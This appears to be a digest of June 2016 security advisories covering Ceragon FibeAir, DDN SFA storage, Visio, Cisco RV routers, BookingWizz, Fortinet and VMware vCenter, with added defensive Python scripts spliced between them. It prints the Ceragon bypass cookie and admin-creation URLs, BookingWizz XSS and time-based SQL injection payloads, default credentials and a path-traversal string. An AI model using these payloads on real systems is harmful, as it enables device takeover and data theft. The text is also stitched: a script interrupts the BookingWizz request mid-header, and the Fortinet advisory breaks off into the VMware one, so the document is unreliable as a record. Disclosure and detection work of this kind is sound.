Authentication bypass in Ceragon FibeAir IP-10 web interface (<7.2.0)

2016-06-15 Thread iancling
[+] Credits: Ian Ling
[+] Website: iancaling.com

Vendor:
=======
www.ceragon.com

Product:
========
-FibeAir IP-10

Vulnerability Type:
===================
Default Root Account

CVE Reference:
==============
N/A

Vulnerability Details:
======================
Ceragon FibeAir IP-10 devices do not properly ensure that a user has 
authenticated before granting them access to the web interface of the device. 
The attacker simply needs to add a cookie to their session named "ALBATROSS" 
with the value "0-4-11". They can then browse to one of the following URLs 
(varies by model number and software version) to add their own user account 
with full admin privileges:

/responder.fcgi1?winid=106=Users%20%26%20Groups=1=1
/responder.fcgi1?winid=109=Users%20%26%20Groups=1=1
/responder.fcgi1?winid=103=Users%20%26%20Groups=1=1
/responder.fcgi0?winid=89=Users%20%26%20Groups=0

After adding their own user account, they can clear their cookies and log in 
with the new credentials they created.

Affected versions:
All versions below 7.2.0

Impact:
The remote attacker has full control over the device's web interface.


Disclosure Timeline:
====================
Vendor Notification: May 5, 2016
Public Disclosure: June 15, 2016

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Critical
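As an added defensive example (not part of the advisory above), the following Python script flags requests that present the ALBATROSS=0-4-11 cookie on their way to an IP-10. It assumes requests are recorded in front of the device (a reverse proxy or pcap-derived log) in a constructed one-line-per-request format; the timestamps, client addresses and cookie values in the sample are constructed, while the cookie indicator and the winid values come from the advisory.

```python
"""Flag requests that present the unauthenticated ALBATROSS cookie from the advisory.

Added example, not part of the advisory. Assumed (constructed) record format,
one request per line, as a proxy in front of the IP-10 might write it:
    <timestamp> <client-ip> "<method> <path>" "<Cookie header value>"
"""
import re

# Indicators taken from the advisory text
SUSPECT_COOKIE_NAME = "ALBATROSS"
SUSPECT_COOKIE_VALUE = "0-4-11"
USER_MGMT_WINIDS = {"106", "109", "103", "89"}   # "Users & Groups" windows listed above

PATH_RE = re.compile(r"^/responder\.fcgi[01]\?winid=(\d+)")
LINE_RE = re.compile(r'^(\S+) (\S+) "(\S+) ([^"]+)" "([^"]*)"$')


def parse_cookies(header):
    """Turn 'a=1; b=2' into {'a': '1', 'b': '2'} (a repeated name keeps the last value)."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name.strip()] = value.strip()
    return cookies


def parse_line(line):
    """Parse one constructed log record; return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, ip, method, path, cookie_hdr = m.groups()
    return {"ts": ts, "ip": ip, "method": method, "path": path,
            "cookies": parse_cookies(cookie_hdr)}


def classify(record):
    """'high' when the bypass cookie reaches a user-management window,
    'medium' when it is presented on any other path, None when absent."""
    if record["cookies"].get(SUSPECT_COOKIE_NAME) != SUSPECT_COOKIE_VALUE:
        return None
    m = PATH_RE.match(record["path"])
    if m and m.group(1) in USER_MGMT_WINIDS:
        return "high"
    return "medium"


def scan(lines):
    """Return (timestamp, client ip, path, severity) for every suspicious request."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        severity = classify(rec)
        if severity:
            alerts.append((rec["ts"], rec["ip"], rec["path"], severity))
    return alerts


# Constructed sample traffic: a bypass attempt against the user window, a normal
# session, the cookie presented on an unrelated path, and a second bypass attempt.
SAMPLE_LOG = [
    '2016-06-15T10:00:01Z 192.0.2.10 "GET /responder.fcgi1?winid=106=Users%20%26%20Groups=1=1" "ALBATROSS=0-4-11"',
    '2016-06-15T10:00:05Z 192.0.2.11 "GET /responder.fcgi1?winid=106=Users%20%26%20Groups=1=1" "sid=7f3a9c"',
    '2016-06-15T10:01:00Z 192.0.2.10 "GET /index.html" "ALBATROSS=0-4-11"',
    '2016-06-15T10:02:00Z 192.0.2.12 "POST /responder.fcgi0?winid=89=Users%20%26%20Groups=0" "ALBATROSS=0-4-11; theme=dark"',
]

if __name__ == "__main__":
    for ts, ip, path, severity in scan(SAMPLE_LOG):
        print(f"{severity.upper():6} {ts} {ip} {path}")
```

The script only keys on the exact cookie value the advisory names; a logged-in session may legitimately carry the same cookie, so a "medium" hit is best correlated with whether that client address ever completed a login.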


[MWR-2016-0002] DDN Default SSH Keys

2016-06-15 Thread john . fitzpatrick
###[DDN Default SSH Keys]###

DDN SFA devices have default SSH keys in place

* Product: DDN SFA storage devices, all versions, all models
* Severity: High
* CVE Reference: NO CVE ASSIGNED - MWR ref: MWR-2016-0002
* Type: Default Credentials
* Author: John Fitzpatrick
* Date: 2016-06-15

## Description

DDN controllers ship with a set of static entries within the authorized_keys 
file of several of the user accounts. The corresponding private keys can be 
obtained from publicly available sources.


## Impact

An adversary can make use of these keys in order to gain access to the DDN 
controller even if the default passwords have been changed.


## Cause

Insecure design and device hardening.


## Interim Workaround

MWR strongly recommend restricting access to all DDN management interfaces via 
the use of ACLs until DDN provide an appropriate resolution to this issue.


## Solution

DDN have not provided a solution to this and have indicated that they may 
resolve it towards the end of the second half of 2016. Exploitation of this 
issue combined with MWR-2016-0001 (DDN Insecure Imaging Process) can provide 
the access required in order to resolve this but may affect any 
warranty/support contract covering the devices.

A solution to this issue will require a firmware update from DDN which removes 
these keys on deployment of new firmware.


## Further Information

DDN controllers run a Debian derived Linux distribution which has a number of 
different users. Some of these users are configured with an authorized_keys 
entry permitting them to log in via SSH using the corresponding private key. 
The authorized_keys entries were found to be common across all DDN devices and 
versions tested meaning exposure of the corresponding private keys would 
provide an adversary access to all DDN devices.

The corresponding private key was found to also be included within the firmware 
distributed for DDN controllers. DDN firmware is available for download by any 
DDN customer, although with some searching it can also be found publicly.

The following user accounts on the DDN controllers were found to permit 
authentication using known keys. The respective MD5sums are shown below:

   diag:
   /home/diag/.ssh$ md5sum *
   e5138c922279b8d194896bacefc31992  authorized_keys
   d2a101dc1f8dd610c146735d71d7e77a  id_rsa

   stats:
   /home/stats/.ssh$ md5sum *
   7c3c7a068e07ed28a84eba1d3b4812a1  authorized_keys
   ffe5fdd80332ed5170851b3d8cdf6f30  id_rsa

   user:
   /home/user/.ssh$ md5sum *
   7c3c7a068e07ed28a84eba1d3b4812a1  authorized_keys
   ffe5fdd80332ed5170851b3d8cdf6f30  id_rsa

   ddn:
   /ddn/.ssh$ md5sum *
   1076f91f58db9040d87fe29b863ad5b7  authorized_keys
   202a962bac24c892c1248dff050d413c  id_rsa

Anyone in possession of the respective private keys would be in a position to 
authenticate via SSH as any one of the users listed above.

The root user does not have any authorized_keys entries, additionally the 
default SSH configuration does not permit root to log in via SSH. The firmware 
user also has no authorized_keys entries.

When combined with the vulnerability described in “DDN Insecure Update Process 
– MWR-2016-0001” it is possible to gain full root access to a DDN controller.

This advisory will be updated appropriately should DDN choose to provide a 
solution to this security issue.


## Timeline

2016-03-09: Initial contact made with DDN
2016-03-14: Conference call with DDN engineers
2016-03-15: Full vulnerability details provided to DDN
2016-05-16: Advisory released for limited disclosure
2016-06-15: Advisory released

(Thanks to those who were key in identifying this vulnerability)

The full MWRLabs maintained advisory can be found here: 
https://labs.mwrinfosecurity.com/advisories/ddn-default-ssh-keys/
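As an added example (not MWR's tooling), the following Python script audits a filesystem tree, such as a mounted controller image or a live /home, for the default key files listed above. The MD5 values are the ones published in the advisory; the demo tree it can build for itself is constructed and uses a made-up key line.

```python
"""Audit a filesystem tree for the default SSH key files listed in MWR-2016-0002.

Added example, not MWR's tooling. The MD5 values are those published in the
advisory; a hit means the shipped default keys are still in place.
"""
import hashlib
import os
import sys
import tempfile
from pathlib import Path

# File hashes from the advisory, mapped to where they were observed
KNOWN_MD5 = {
    "e5138c922279b8d194896bacefc31992": "diag authorized_keys",
    "d2a101dc1f8dd610c146735d71d7e77a": "diag id_rsa",
    "7c3c7a068e07ed28a84eba1d3b4812a1": "stats/user authorized_keys",
    "ffe5fdd80332ed5170851b3d8cdf6f30": "stats/user id_rsa",
    "1076f91f58db9040d87fe29b863ad5b7": "ddn authorized_keys",
    "202a962bac24c892c1248dff050d413c": "ddn id_rsa",
}
TARGET_NAMES = {"authorized_keys", "id_rsa"}


def md5_of(path):
    """MD5 of a file, read in chunks (MD5 only because that is what the advisory publishes)."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def find_ssh_files(root):
    """Yield every authorized_keys / id_rsa that sits inside a .ssh directory under root."""
    for dirpath, _dirnames, filenames in os.walk(root):
        if Path(dirpath).name != ".ssh":
            continue
        for name in filenames:
            if name in TARGET_NAMES:
                yield Path(dirpath) / name


def audit(root, known=KNOWN_MD5):
    """Return [(path, md5, label)] for files whose hash matches a known default key file."""
    hits = []
    for path in find_ssh_files(root):
        digest = md5_of(path)
        if digest in known:
            hits.append((str(path), digest, known[digest]))
    return hits


def make_demo_tree():
    """Constructed demo: a temporary home tree with one authorized_keys; returns (root, its md5)."""
    root = Path(tempfile.mkdtemp(prefix="ddn-audit-"))
    ssh_dir = root / "home" / "diag" / ".ssh"
    ssh_dir.mkdir(parents=True)
    key_line = b"ssh-rsa AAAAB3NzaC1yc2E constructed-demo-key\n"
    (ssh_dir / "authorized_keys").write_bytes(key_line)
    return root, hashlib.md5(key_line).hexdigest()


if __name__ == "__main__":
    if len(sys.argv) > 1:
        hits = audit(sys.argv[1])                      # e.g. a mounted controller image
    else:
        root, demo_md5 = make_demo_tree()              # self-contained demo run
        hits = audit(root, known={**KNOWN_MD5, demo_md5: "constructed demo key"})
    for path, digest, label in hits:
        print(f"DEFAULT KEY PRESENT: {path} ({digest}) matches {label}")
    if not hits:
        print("no known default key files found")
```

Run it against the root of an extracted firmware image as well as the live system: the advisory notes the private key ships inside the firmware, so a clean /home says nothing about what the next update will redeploy.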


[MWR-2016-0001] DDN Insecure Update Mechanism

2016-06-15 Thread john . fitzpatrick
###[DDN Insecure Update Process]###

An insecure update mechanism on DDN SFA devices allows for privilege escalation

* Product: DDN SFA storage devices, all versions, all models
* Severity: High
* CVE Reference: NO CVE ASSIGNED - MWR ref: MWR-2016-0001
* Type: Insecure update mechanism
* Author: John Fitzpatrick
* Date: 2016-06-15


## Description

The mechanism used for updating firmware on DDN controllers is insecure 
allowing for privilege escalation to root.


## Impact

Exploitation of this issue can allow for code execution as root allowing an 
adversary to gain full access to the DDN controller.


## Cause

This is caused by an insecure firmware update mechanism which does not validate 
the legitimacy of the firmware being uploaded.


## Interim Workaround

MWR strongly recommend restricting access to all DDN management interfaces via 
the use of ACLs until DDN provide an appropriate resolution to this issue. In 
addition it should be ensured that appropriate mitigating controls are 
implemented for the accompanying advisory “DDN Default SSH Keys – 
MWR-2016-0002” and that default user account passwords are changed. 


## Solution

There is no vendor supplied solution to this vulnerability. When DDN have 
resolved this vulnerability DDN users should apply the appropriate fixes.

It is recommended that DDN implement a signing mechanism that validates that 
firmware is from a trusted source before attempting to deploy it. Making use of 
public key cryptography in order to sign firmware would be a suitable approach 
if correctly implemented. DDN have, however, chosen not to comment on their 
preferred resolution or its progress but have indicated that they may resolve 
this issue towards the end of 2016.


## Further Information

DDN firmware is provided as a .tar file. Within this archive is another archive 
containing the contents of the filesystem which, when an update is run, is 
extracted and deployed to disk. A number of shell scripts also execute during 
the update process and these are executed as root. Therefore, by either 
manipulating the shell scripts or by modifying the filesystem contents within 
the archive, it is possible to perform activities which would provide full root 
access to the DDN device.

There is a signing mechanism in place; however, this is focused on ensuring 
files are not corrupt rather than ensuring that files are from a legitimate 
source. Within janus.md5 is a list of MD5 checksums for all files within the 
archive. These entries can simply be replaced with new MD5s as appropriate.

In order to perform an update, it is necessary to have access to accounts on 
the DDN controller. Our testing was performed via SSH using the firmware 
account to drop the firmware. This account has a very guessable password set by 
default. The ddn user account was then used in order to load the new 
config/firmware via the appropriate menu options. The ddn user also has a 
default password set, but this is much less guessable. However, even if the 
default passwords have been changed it will be possible to use the default SSH 
keys described in MWR-2016-0002 (DDN Default SSH Keys) in order to gain the 
required level of access in order to deploy the new firmware.

Ironically, successful exploitation of this insecure update mechanism allows 
DDN users to remove the default SSH keys and secure their devices. Whether this 
would impact support contracts or warranties with DDN or other suppliers is 
unknown.

This advisory will be updated should DDN choose to provide an appropriate 
solution to this security issue.


## Timeline

2016-03-09: Initial contact made with DDN
2016-03-14: Conference call with DDN engineers
2016-03-15: Full vulnerability details provided to DDN
2016-05-16: Advisory released for limited disclosure
2016-06-15: Advisory released

(Thanks to those who were key in identifying this vulnerability)

The full MWRLabs maintained advisory can be found here: 
https://labs.mwrinfosecurity.com/advisories/ddn-insecure-update-process/
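As an added example (not DDN's update code), the following Python shows why a janus.md5-style checksum list only detects corruption, and what a signature over that list adds. The firmware "archive" is a constructed dict of path to bytes, and the signature is an HMAC-SHA256 stand-in for the public-key signature the advisory recommends: an HMAC key would have to sit on every controller, which is exactly why production code should use an asymmetric signature whose private key never leaves the vendor.

```python
"""Checksum manifest (integrity) versus signed manifest (authenticity).

Added example, not DDN's update code. FIRMWARE and VENDOR_KEY are constructed;
HMAC-SHA256 stands in for an asymmetric signature over the manifest.
"""
import hashlib
import hmac

# Constructed stand-in for the firmware archive contents
FIRMWARE = {
    "bin/sfa-controller": b"\x7fELF constructed binary contents",
    "scripts/post_install.sh": b"#!/bin/sh\n/usr/sbin/sfa-apply-config\n",
}
VENDOR_KEY = b"constructed-vendor-signing-key"   # would be an asymmetric private key in practice


def make_md5_manifest(files):
    """janus.md5-style manifest: '<md5>  <path>' per file, sorted by path."""
    lines = [f"{hashlib.md5(data).hexdigest()}  {path}" for path, data in sorted(files.items())]
    return "\n".join(lines) + "\n"


def verify_md5_manifest(files, manifest):
    """Integrity only: every listed file hashes to its listed value, no extra or missing files."""
    expected = {}
    for line in manifest.splitlines():
        digest, _, path = line.partition("  ")
        expected[path] = digest
    if set(expected) != set(files):
        return False
    return all(hashlib.md5(files[p]).hexdigest() == d for p, d in expected.items())


def sign_manifest(manifest, key):
    """Keyed signature over the manifest text (HMAC stand-in for a public-key signature)."""
    return hmac.new(key, manifest.encode(), hashlib.sha256).hexdigest()


def verify_signed_update(files, manifest, signature, key):
    """Authenticity: the manifest must verify under the key, then files must match it."""
    if not hmac.compare_digest(sign_manifest(manifest, key), signature):
        return False
    return verify_md5_manifest(files, manifest)


def tampered_copy(files):
    """What the advisory describes: alter a root-executed script and regenerate the checksums."""
    modified = dict(files)
    modified["scripts/post_install.sh"] = b"#!/bin/sh\n# altered\n/usr/sbin/sfa-apply-config\n"
    return modified, make_md5_manifest(modified)


def demo():
    manifest = make_md5_manifest(FIRMWARE)
    sig = sign_manifest(manifest, VENDOR_KEY)          # produced by the vendor at build time
    bad_files, bad_manifest = tampered_copy(FIRMWARE)  # attacker lacks VENDOR_KEY, so sig is stale
    return {
        "original_md5_ok": verify_md5_manifest(FIRMWARE, manifest),
        "original_signed_ok": verify_signed_update(FIRMWARE, manifest, sig, VENDOR_KEY),
        "tampered_md5_ok": verify_md5_manifest(bad_files, bad_manifest),
        "tampered_signed_ok": verify_signed_update(bad_files, bad_manifest, sig, VENDOR_KEY),
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check}: {result}")
```

The two "tampered" results are the whole point: the regenerated checksum list passes, the signature does not, because the signature binds the manifest to a key the person editing the archive does not hold. The manifest must also be exhaustive, which is why the integrity check rejects files present in the archive but absent from the list.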


Microsoft Visio multiple DLL side loading vulnerabilities

2016-06-15 Thread Securify B.V.


Microsoft Visio multiple DLL side loading vulnerabilities

Yorick Koster, August 2015


Abstract

Multiple DLL side loading vulnerabilities were found in Microsoft Visio.
These issues can be exploited by loading various Visio COM components as
an embedded OLE object. When instantiating a vulnerable object Windows
will try to load the DLL msoutls.dll from the current working directory.
If an attacker convinces the user to open a specially crafted (Office)
document from a directory also containing the attacker's DLL file, it is
possible to execute arbitrary code with the privileges of the target
user. This can potentially result in the attacker taking complete
control of the affected system.


See also

- CVE-2016-3235
- MS16-070: Security Update for Microsoft Office (3163610)


Tested versions

This issue was successfully verified on Windows 7 + Visio 2010.
Microsoft reports that this issue also affects Microsoft Visio 2007,
Microsoft Visio 2013, and Microsoft Visio 2016.


Fix

Microsoft released MS16-070 that fixes this vulnerability.


Details

https://www.securify.nl/advisory/SFY20150804/microsoft_visio_multiple_dll_side_loading_vulnerabilities.html


Cisco Security Advisory: Cisco RV110W, RV130W, and RV215W Routers Arbitrary Code Execution Vulnerability

2016-06-15 Thread Cisco Systems Product Security Incident Response Team
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco RV110W, RV130W, and RV215W Routers Arbitrary Code Execution Vulnerability

Advisory ID: cisco-sa-20160615-rv

Revision 1.0

For Public Release 2016 June 15 16:00 UTC (GMT)

+--------------------------------------------------------------------

Summary
=======

A vulnerability in the web interface of the Cisco RV110W Wireless-N VPN 
Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and the Cisco 
RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to 
execute arbitrary code as root on a targeted system.
 
The vulnerability is due to insufficient sanitization of HTTP user-supplied 
input. An attacker could exploit this vulnerability by sending a crafted HTTP 
request with custom user data. An exploit could allow the attacker to execute 
arbitrary code with root-level privileges on the affected system, which could 
be leveraged to conduct further attacks.

Cisco has not released software updates that address this vulnerability. 
Workarounds that mitigate this vulnerability are not available. 

This advisory is available at the following link: 

http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160615-rv

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (SunOS)

-----END PGP SIGNATURE-----


BookingWizz < 5.5 Multiple Vulnerability

2016-06-15 Thread mehmet
1. ADVISORY INFORMATION

Title: BookingWizz < 5.5 Multiple Vulnerability
Application: BookingWizz 
Class: Sensitive Information disclosure
Remotely Exploitable: Yes
Versions Affected: < 5.5
Vendor URL: http://codecanyon.net/item/booking-system/87919
Bugs:  Default credentials, CSRF, XSS, SQL Injection, LFI
Date of Public Advisory: 15 Jun 2016
Author: Mehmet Ince


2. CREDIT

These vulnerabilities were identified during an external penetration test
by Mehmet INCE from PRODAFT / INVICTUS

Original Advisory: 
https://www.mehmetince.net/exploit/bookingwizz-55-multiple-vulnerability

PR1 - Default Administrator Credentials

File: install.php

People are too lazy to change default credentials unless the application forces 
them to do that.

Line 128: Default username/password: admin/pass";


PR2 - Cross Site Scripting

File : eventList.php
// Improper user input validation on

Line 24: $serviceID = 
(!empty($_REQUEST["serviceID"]))?strip_tags(str_replace("'","`",$_REQUEST["serviceID"])):getDefaultService();

Line 60:   

Payload = 1337" onmouseover="alert(1)
PoC = 
http://www.convergine.com/scripts/booking/eventList.php?serviceID=1337%22%20onmouseover=%22alert(1)


PR3 - Local File Inclusion

File:config.php

The lang variable is under user control.

Line 31: $lang = (!empty($_REQUEST["lang"])) ? strip_tags(str_replace("'", "`", 
$_REQUEST["lang"])) : 'english';

Storing the user-controlled variable within a session variable.

Line 36 - 38 : 

if (!empty($_REQUEST["action"]) && $_REQUEST["action"] == "changelang") {
$_SESSION['curr_lang'] = $lang;
}

And using it with the include function, which causes straightforward file inclusion.

Line 60 - 68:

$languagePath = MAIN_PATH."/languages/".$_SESSION['curr_lang'].".lang.php";
if(is_file($languagePath)) {
    include MAIN_PATH."/languages/".$_SESSION['curr_lang'].".lang.php";
}else{
    print "ERROR !!! Language file ".$_SESSION['curr_lang'].".lang.php not found";
    exit();
}

PR4 - SQL Injection

We've seen a lot of potential SQL Injection vulnerabilities during code review.
Two examples can be given for these potential points. 

File : ajax/checkDeletedServices.php

line 19 - 20:

$bsid = (!empty($_REQUEST["bsid"])) ? $_REQUEST["bsid"] : array();
$type = (!empty($_REQUEST["type"])) ? $_REQUEST["type"] : 'service';

Line 26:

if($type=='service'){
$service = getService($id);
$name = $service['name'];
}

This function executes a query with the $id parameter, which is user input passed 
through the checkDeletedServices.php file.

function getService($id, $field=null) {
    $sql = "SELECT * FROM bs_services WHERE id='{$id}'";
    $res = mysql_query($sql);
    if ($field == null) {
        return mysql_fetch_assoc($res);
    } else {
        $row = mysql_fetch_assoc($res);
        return $row[$field];
    }
}


File : ajax/checkChangeAvailability.php

Line 19 -21
$id = (!empty($_REQUEST["id"])) ? $_REQUEST["id"] : '';
$interval = getServiceSettings($id,'interval');


The getServiceSettings function calls another function named getService which is 
also vulnerable to SQL Injection.

function getServiceSettings($id, $field=null) {
    $serviceType = getService($id,'type');
    if($serviceType=='t'){
        $sql = "SELECT * FROM bs_service_settings bss
                INNER JOIN bs_services bs ON bss.serviceId  = bs.id
                WHERE bss.serviceID='{$id}'";
    }else{
        $sql = "SELECT * FROM  bs_service_days_settings bsds
                INNER JOIN bs_services bs ON bsds.idService  = bs.id
                WHERE bsds.idService='{$id}'";
    }
    $res = mysql_query($sql);
    $row = mysql_fetch_assoc($res);
    $row['type'] = $serviceType;
    if ($field == null) {
        return $row;
    } else {
        return $row[$field];
    }
}

In order to exploit these flaws, time-based SQLi techniques were used.

Payload: id=1' AND SLEEP(5) AND 'WAlE'='WAlE

PR5 - CSRF

File: bs-settings.php

This file is responsible for administrator account settings. Here is the HTTP 
POST request.

POST /booking/bs-settings.php HTTP/1.1
Host: www.test.dev
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.test.dev/scripts/booking/bs-settings.php
Cookie: PHPSESSID=1511036c75229f53ae475a0615661394; 
__utma=256227097.1395600583.1465982938.1465982938.1465982938.1; 
__utmc=256227097; 
__utmz=256227097.1465982938.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 
wordfence_verifiedHuman=498f28acf0e6151e19053a23c0fbc76b
Connection: close
Content-Type: multipart/form-data; 
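As an added example (not the product's code), the following Python shows hardened counterparts to the two code patterns quoted in PR3 and PR4: a bound parameter in place of the string-built query in getService(), and an exact allowlist in place of strip_tags() for the language token that config.php stores in the session. Python with sqlite3 stands in for the PHP/mysql_query code; the table, rows, languages directory and allowlist are constructed, and the payload is the one quoted in the advisory.

```python
"""Hardened counterparts to the BookingWizz patterns quoted above (PR3 and PR4).

Added example, not the product's code: Python/sqlite3 stands in for PHP/mysql,
and the table, rows, languages directory and allowlist are constructed.
"""
import sqlite3
from pathlib import PurePosixPath

# Payload quoted in the advisory (PR4)
PAGE_PAYLOAD = "1' AND SLEEP(5) AND 'WAlE'='WAlE"


def make_demo_db():
    """Constructed in-memory bs_services table with two rows."""
    conn = sqlite3.connect(":memory:")
    conn.row_factory = sqlite3.Row
    conn.execute("CREATE TABLE bs_services (id INTEGER PRIMARY KEY, name TEXT, type TEXT)")
    conn.executemany("INSERT INTO bs_services VALUES (?, ?, ?)",
                     [(1, "Haircut", "t"), (2, "Massage", "d")])
    return conn


def get_service_unsafe(conn, service_id):
    """Same construction as getService(): the request value becomes part of the SQL text."""
    sql = f"SELECT * FROM bs_services WHERE id='{service_id}'"
    row = conn.execute(sql).fetchone()
    return dict(row) if row else None


def get_service_safe(conn, service_id):
    """Bound parameter: the value is data and can never change the statement's structure."""
    row = conn.execute("SELECT * FROM bs_services WHERE id = ?", (service_id,)).fetchone()
    return dict(row) if row else None


def compare(conn, service_id):
    """Run both variants on one input and report what happened to each."""
    try:
        unsafe = get_service_unsafe(conn, service_id)
    except sqlite3.OperationalError as exc:
        unsafe = f"sql error: {exc}"      # the input reached the SQL parser as code
    return {"unsafe": unsafe, "safe": get_service_safe(conn, service_id)}


# PR3: language selection. Validate against an allowlist before anything is
# stored in the session, and build the include path only from the validated token.
LANGUAGES_DIR = PurePosixPath("/var/www/booking/languages")   # constructed
AVAILABLE_LANGS = frozenset({"english", "french", "german"})   # constructed allowlist


def resolve_language_file(lang, available=AVAILABLE_LANGS, base=LANGUAGES_DIR):
    """Exact allowlist membership instead of strip_tags(); None means reject the request."""
    if not isinstance(lang, str) or lang not in available:
        return None
    return str(base / f"{lang}.lang.php")


if __name__ == "__main__":
    conn = make_demo_db()
    for value in ("1", PAGE_PAYLOAD):
        print(repr(value), compare(conn, value))
    for lang in ("english", "../../../../etc/passwd"):
        print(repr(lang), resolve_language_file(lang))
```

With the advisory's payload the string-built query fails inside the SQL engine (SQLite has no SLEEP, so the error itself proves the input was parsed as SQL), while the bound-parameter version simply finds no service with that id. For the language token, rejecting anything outside the allowlist at the changelang step means nothing untrusted ever reaches $_SESSION['curr_lang'] or the include.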

FortiManager & FortiAnalyzer - (filename) Persistent Web Vulnerability

2016-06-15 Thread Vulnerability Lab
Document Title:
===============
FortiManager & FortiAnalyzer - (filename) Persistent Web Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1687

Fortinet PSIRT ID: 1624561

Release Notes #1: 
http://docs.fortinet.com/uploaded/files/2796/fortios-5.4.0-release-notes.pdf
Release Notes #2: 
http://docs.fortinet.com/uploaded/files/2861/fortios-v5.2.6-release-notes.pdf
Release Notes #3: 
http://docs.fortinet.com/uploaded/files/2499/fortios-5.0.12-release-notes.pdf


Release Date:
=============
2016-06-15


Vulnerability Laboratory ID (VL-ID):
====================================
1687


Common Vulnerability Scoring System:
====================================
3.7


Product & Service Introduction:
===============================
FortiManager appliances allow you to centrally manage any number of Fortinet 
devices, from several to thousands, including FortiGate®, FortiWiFi™, 
FortiCarrier™, FortiMail™ and FortiAnalyzer™ appliances and virtual appliances, 
as well as FortiClient™ endpoint security agents. You can further 
simplify control and management of large deployments by grouping devices and 
agents into administrative domains (ADOMs).

The FortiManager family of management appliances provides centralized 
policy-based provisioning, device configuration, and update management for 
FortiGate, FortiWiFi, and FortiMail appliances, and FortiClient end-point 
security agents, plus end-to-end network monitoring and device control. 
FortiManager delivers a lower TCO for Fortinet implementations by minimizing 
both initial deployment costs and ongoing operating expenses. Control 
administrative access and simplify policy deployment using role-based 
administration to define user privileges for specific management domains and 
functions, and aggregating collections of Fortinet appliances and agents into 
independent management domains. In addition, by locally hosting security 
content updates for managed devices and agents, FortiManager appliances 
minimize Web filtering rating request response time and maximize network 
protection.

(Copy of the Vendor Homepage:  
http://www.avfirewalls.com/FortiManager-Series.asp )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a persistent web 
validation vulnerability in the official Fortinet FortiManager and FortiAnalyzer 
appliance product series.


Vulnerability Disclosure Timeline:
==================================
2016-01-25: Researcher Notification & Coordination (Marco Onorati - Evolution 
Security GmbH)
2016-01-26: Vendor Notification (FortiGuard Security Team)
2016-02-10: Vendor Response/Feedback (FortiGuard Security Team)
2016-02-17: Vendor Fix/Patch #1 (Fortinet Service Developer Team)
2016-05-08: Vendor Fix/Patch #2 (Fortinet Service Developer Team)
2016-06-16: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Fortinet
Product: FortiManager - Appliance (Web-Application) 200D,  300D, 1000D,  3900E, 
4000E, Virtual Appliances Versio

Fortinet
Product: FortiManager - Appliance (Web-Application) Legacy - 100, 100C, 400A, 
400B, 400C, 1000C, 3000C & 4000

Fortinet
Product: FortiAnalyzer - Appliance (Web-Application) 200D, 300D, 1000D, 2000D, 
3000E, 3500E, 3900E, VM Base & VM 


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation web vulnerability and filter bypass issue has 
been discovered in the official Fortinet FortiManager and FortiAnalyzer 
appliance product series.
The application-side web vulnerability allows remote attackers to inject own 
malicious script codes on the application-side of the affected modules context.

The vulnerability is located in the `filename` value of the `Layout Header 
[Header Image]` module. Remote attackers with low privileged web-application 
user accounts are able to inject own malicious script codes on the 
application-side of the affected `Advanced Settings - Advanced Settings - 
Layout Header` module. The request method to inject is POST and the issue is 
located on the application-side of the fortimanager/fortianalyzer appliance 
web-application.

The security risk of the client-side cross site scripting web vulnerability is 
estimated as medium with a cvss (common vulnerability scoring system) count of 
3.7. Exploitation of the application-side web vulnerability requires no 
privileged web-application user account and low or medium user interaction. 
Successful exploitation of the vulnerability results in persistent phishing, 
session hijacking, persistent external redirect to malicious sources and 
application-side manipulation of affected or connected web module context.


Request Method(s):
[+] POST

Vulnerable Module(s):

NEW VMSA-2016-0009 VMware vCenter Server updates address an important reflective cross-site scripting issue

2016-06-15 Thread VMware Security Response Center
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
VMware Security Advisory

Advisory ID: VMSA-2016-0009
Synopsis:VMware vCenter Server updates address an important
 reflective cross-site scripting issue
Issue date:  2016-06-14
Updated on:  2016-06-14 (Initial Advisory)
CVE number:  CVE-2015-6931
- ------------------------------------------------------------------------

1. Summary

   VMware vCenter Server updates address an important reflective
   cross-site scripting issue.

2. Relevant Releases

   vCenter Server 5.5 prior to 5.5 update 2d
   vCenter Server 5.1 prior to 5.1 update 3d
   vCenter Server 5.0 prior to 5.0 update 3g


3. Problem Description

   a. Important vCenter Server reflected cross-site scripting issue

   The vSphere Web Client contains a reflected cross-site scripting
   vulnerability due to a lack of input sanitization. An attacker can
   exploit this issue by tricking a victim into clicking a malicious
   link.

   VMware would like to thank Matt Schmidt for reporting this issue to
   us.

   The Common Vulnerabilities and Exposures project (cve.mitre.org) has
   assigned the identifier CVE-2015-6931 to this issue.

   Column 4 of the following table lists the action required to
   remediate the vulnerability in each release, if a solution is
   available.

   VMware          Product   Running   Replace with/
   Product         Version   on        Apply Patch
   ==============  ========  ========  =============
   vCenter Server  6.0       Any       not affected
   vCenter Server  5.5       Any       5.5 U2d *
   vCenter Server  5.1       Any       5.1 U3d *
   vCenter Server  5.0       Any       5.0 U3g *

   * The client side component of the vSphere Web Client does not need
 to be updated to remediate CVE-2015-6931. Updating the vCenter
 Server is sufficient to remediate this issue.


4. Solution

   Please review the patch/release notes for your product and
   version and verify the checksum of your downloaded file.

